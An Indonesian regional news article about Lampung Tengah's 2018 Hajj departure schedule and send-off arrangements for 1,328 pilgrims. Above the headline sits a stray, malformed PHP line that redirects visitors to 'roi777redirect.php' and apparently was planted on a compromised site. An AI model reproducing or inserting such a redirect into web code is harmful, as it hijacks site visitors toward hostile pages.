header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Keberangkatan Jamaah Haji Lamteng Dibagi Dua Gelombang -
Keberangkatan Jamaah Haji Lamteng Dibagi Dua Gelombang

Kemenag dan Penkab Lamteng menggelar rapat teknis pemberangkatan jamaah haji tahun 2018.

TRANSLAMPUNG.COM, GUNUNGSUGIH – Kantor Kementerian Agama dan Pemkab Lampung Tengah melakukan rapat teknis pemberangkatan jamaah haji, Senin (9/7/2018).

Kepala Kemenag Lamteng Jamaluddin mengatakan, berdasarkan jadwal keberangkatan, jamaah haji asal Lamteng akan dibagi menjadi dua gelombang.

Adapun jamaah haji yang akan diberangkatkan adalah 1.328 orang. Secara bertahap diberangkatkan sebanyak empat kali.

Yakni tanggal 21 dan 24 Juli 2018 untuk gelombang pertama. “Sedangkan pada tanggal 2 dan 4 Agustus 2018 untuk gelombang kedua,” ujarnya, Rabu (11/7/2018).

Kemudian, skenario pemberangkatan sekaligus pelepasan jamaah haji dimulai dari penerimaan jamaah yang akan ditempatkan di halaman rumah dinas Wakil Bupati Lamteng.

Acara seremonial, penerimaan tamu undangan, konsumsi, tersedianya mobil ambulans dan tim kesehatan, sampai jamaah haji harus menaiki kendaraan bus secara bergantian.

“Kegiatan ini sudah menjadi agenda rutin tahunan, harus tetap menjaga kekompakannya dalam melayani jamaah yang merupakan terbanyak sepanjang sejarah penyelenggaraan haji Lampung Tengah,” terangnya. (rls/rid)

News Reporter